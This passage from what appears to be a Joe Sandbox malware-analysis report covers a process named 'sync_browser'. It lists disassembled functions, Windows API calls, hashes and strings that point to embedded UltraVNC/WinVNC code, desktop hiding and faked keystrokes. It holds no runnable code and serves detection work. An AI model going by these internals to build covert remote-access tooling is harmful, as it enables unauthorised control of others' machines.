Yara matches

Similarity

API ID: Event$CriticalInitializeSection
String ID:
API String ID: 4164307405-0
Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
Instruction ID: aad2b44b7ab83e0423c1262f704e10ed2f5f8c94b14ec4fea721a522beb6e340
Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
Instruction Fuzzy Hash: 4D010872518B41C2D740AF25E9840A8B3F8FF98F98B540136CA9D47778CF38D4A5C360

Function 00007FF740023220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 00007FF74002323C
sprintf.LIBCMT ref: 00007FF7400232C9

Strings

IP address unavailable, xrefs: 00007FF74002324A
%d., xrefs: 00007FF7400232B4

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: gethostbynamesprintf
String ID: %d.$IP address unavailable
API String ID: 4032199589-2983120142
Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
Instruction ID: 8e6d2250e7fa2d734d229752c4b868e4248e75f7ec73c9eaf9af7367fb3985cf
Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
Instruction Fuzzy Hash: 2841B12161CA85C1D620FB25A84066AF7A0FB48BF4F945335EEAE43BE9DF3CE5458710

Function 00007FF74006A130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74006A183

Strings

Default, xrefs: 00007FF74006A1CC

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopInputOpen
String ID: Default
API String ID: 601053899-753088835
Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction ID: 12d48d2e1eea4117b28508db96299c3f069b24324dd8060eb8be6e109739f2c6
Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction Fuzzy Hash: 96214D35B1C682C2EA65FB11B4157BAA3A1FB8A744FC40435DA8D47BA9DF2CF114CB20

Function 00007FF7400502A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyA.USER32 ref: 00007FF7400502C5
MapVirtualKeyA.USER32 ref: 00007FF7400502F1

Strings

fake %d up, xrefs: 00007FF7400502D8
fake %d down, xrefs: 00007FF740050305

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Virtual
String ID: fake %d down$fake %d up
API String ID: 4278518827-2496597273
Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
Instruction ID: eaf3af5bf97cedb3605d897d093e9fa8e54c0804a6eee5177c3508673988035c
Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
Instruction Fuzzy Hash: FA01CE21F0D281C2E315BB26A05017DEBA2AF88704F998039D64E073B9CE3CE446C760

Function 00007FF74000A550 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000A440: RegOpenKeyExA.ADVAPI32 ref: 00007FF74000A465
Part of subcall function 00007FF74000A440: RegQueryValueExA.ADVAPI32 ref: 00007FF74000A49F
Part of subcall function 00007FF74000A440: RegCloseKey.ADVAPI32 ref: 00007FF74000A4AA

SystemParametersInfoA.USER32 ref: 00007FF74000A594
SystemParametersInfoA.USER32 ref: 00007FF74000A5AC

Part of subcall function 00007FF74000A390: LoadLibraryA.KERNEL32 ref: 00007FF74000A3A6
Part of subcall function 00007FF74000A390: LoadLibraryA.KERNEL32 ref: 00007FF74000A3CB
Part of subcall function 00007FF74000A390: GetProcAddress.KERNEL32 ref: 00007FF74000A3E3
Part of subcall function 00007FF74000A390: FreeLibrary.KERNEL32 ref: 00007FF74000A407

Strings

HideDesktop.cpp : Killwallpaper %i, xrefs: 00007FF74000A55B
HideDesktop.cpp : Killwallpaper %i %i, xrefs: 00007FF74000A5C1

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
API String ID: 542764273-2415377678
Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction ID: 68fad7193b27fe55a6ffe6ddd87d3c32773f0b3c23ef8947884da4c38d427d9a
Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction Fuzzy Hash: 9201F7B5D0C543C2E650BB60F8006B9A7A1BB94348FC04036D80D16765DE7CB20ACB72

Function 00007FF74006A220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

FindWindowExA.USER32 ref: 00007FF74006A23F
GetWindowThreadProcessId.USER32 ref: 00007FF74006A259
GetCurrentProcessId.KERNEL32 ref: 00007FF74006A25F

Strings

WinVNC Tray Icon, xrefs: 00007FF74006A230

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessWindow$CurrentFindThread
String ID: WinVNC Tray Icon
API String ID: 1332243453-1071638575
Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
Instruction ID: 22376cf1f6868d28e65d0c11ea874315a293daadd937caf395a2865a6359ef6a
Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
Instruction Fuzzy Hash: 2FF09022B1C741C2EB80BB56B440069E2A1FF887C4FC81036EA1E4672CDF3CE494CB10

Function 00007FF7400BAB9C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF7400BABE5,?,?,00000028,00007FF7400B8C7D,?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749), ref: 00007FF7400BABAB
GetProcAddress.KERNEL32(?,?,000000FF,00007FF7400BABE5,?,?,00000028,00007FF7400B8C7D,?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749), ref: 00007FF7400BABC0

Strings

CorExitProcess, xrefs: 00007FF7400BABB6
mscoree.dll, xrefs: 00007FF7400BABA4

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
Instruction ID: f234b80e2cf92634acb9aa13a6c1f112399be0bb7c066e7c19f96859c609d582
Opcode Fuzzy Hash: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
Instruction Fuzzy Hash: A2E0EC10B1E702C2EE19BBA0A88457453619F99750B881478C42E063B9FE2CF5998330

Function 00007FF7400222C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF740022328

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

free.LIBCMT ref: 00007FF740022564
free.LIBCMT ref: 00007FF740022617

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF74002230B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
API String ID: 1063416079-2438250478
Opcode ID: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
Instruction ID: 5c2fa08e9d1aa823dd9c8a547c1b2fc3772a3b01e787280869b6eaa2a9962d13
Opcode Fuzzy Hash: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
Instruction Fuzzy Hash: 40A17E26B08A91C4EB50FB76D4542AD6360FB84FA8F548236DE2E57BE9CF38D845C310

Function 00007FF74002A580 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF74002A75F
LeaveCriticalSection.KERNEL32 ref: 00007FF74002A78F

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF74002A5D6
i, xrefs: 00007FF74002A754

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
API String ID: 3168844106-2727237473
Opcode ID: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
Instruction ID: 2decd536b8e7e14edcd10a0a428525059e8cccff508693bdc40fb170952ad50b
Opcode Fuzzy Hash: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
Instruction Fuzzy Hash: E261C022B0C7C2DAE765BB2598047BAA7A0FB46754F840139DA9D477E9DF3CE884C710

Function 00007FF740010B70 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetRegionData.GDI32 ref: 00007FF740010C9E
GetRegionData.GDI32 ref: 00007FF740010CCB
GetRegionData.GDI32 ref: 00007FF740010CF6
DeleteObject.GDI32 ref: 00007FF740010D1D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DataRegion$DeleteObject
String ID:
API String ID: 3467850875-0
Opcode ID: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
Instruction ID: ae178ec7e9761134c5c55367dcd658953332d481347d5a19780331104d54dcdb
Opcode Fuzzy Hash: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
Instruction Fuzzy Hash: 9751F1B3609A51C7D750EF19D440A6CB7E0FB48B94B84D232EA4D83768DF39E881CB40

Function 00007FF74000C590 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF74000C5D4

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00007FF74000C5F8
VUUU, xrefs: 00007FF74000C5B3
VUUU, xrefs: 00007FF74000C658

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeap_callnewhmalloc
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
API String ID: 908589684-1814909704
Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction ID: 5415c8e1e333d8ec899f21f27deb8802d8dbab53f7067ce451ef9f5870ab3ac9
Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction Fuzzy Hash: 5821AA32B1D795C6D360AB69B440728B791F744390F881232EB9C07BD9DE3AE002C710

Function 00007FF740017650 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

Sleep.KERNEL32 ref: 00007FF740017720

Part of subcall function 00007FF740017A30: SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A4B
Part of subcall function 00007FF740017A30: SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A55
Part of subcall function 00007FF740017A30: SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A5F
Part of subcall function 00007FF740017A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A8B
Part of subcall function 00007FF740017A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A95

Strings

start_event, xrefs: 00007FF740017703
stop_event, xrefs: 00007FF7400176E0
keyEvent, xrefs: 00007FF7400176BE

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Event$CriticalInitializeSection$Sleepmalloc
String ID: keyEvent$start_event$stop_event
API String ID: 367317321-1979648887
Opcode ID: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
Instruction ID: 46d56b6130015e758cd8708f9f562a61fd78d352018ea7e57f6f0f5b77550ecc
Opcode Fuzzy Hash: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
Instruction Fuzzy Hash: D8313B25E1DA03C0FA64BB54A494B79A3A1AF85784FC40035DA4E0B7FAEF3EF5448761

Function 00007FF740035940 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

InitializeCriticalSection.KERNEL32 ref: 00007FF740035995

Part of subcall function 00007FF7400C2950: RaiseException.KERNEL32 ref: 00007FF7400C29CB

EnterCriticalSection.KERNEL32 ref: 00007FF7400359DF
LeaveCriticalSection.KERNEL32 ref: 00007FF740035A0B

Strings

G, xrefs: 00007FF7400359D4

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
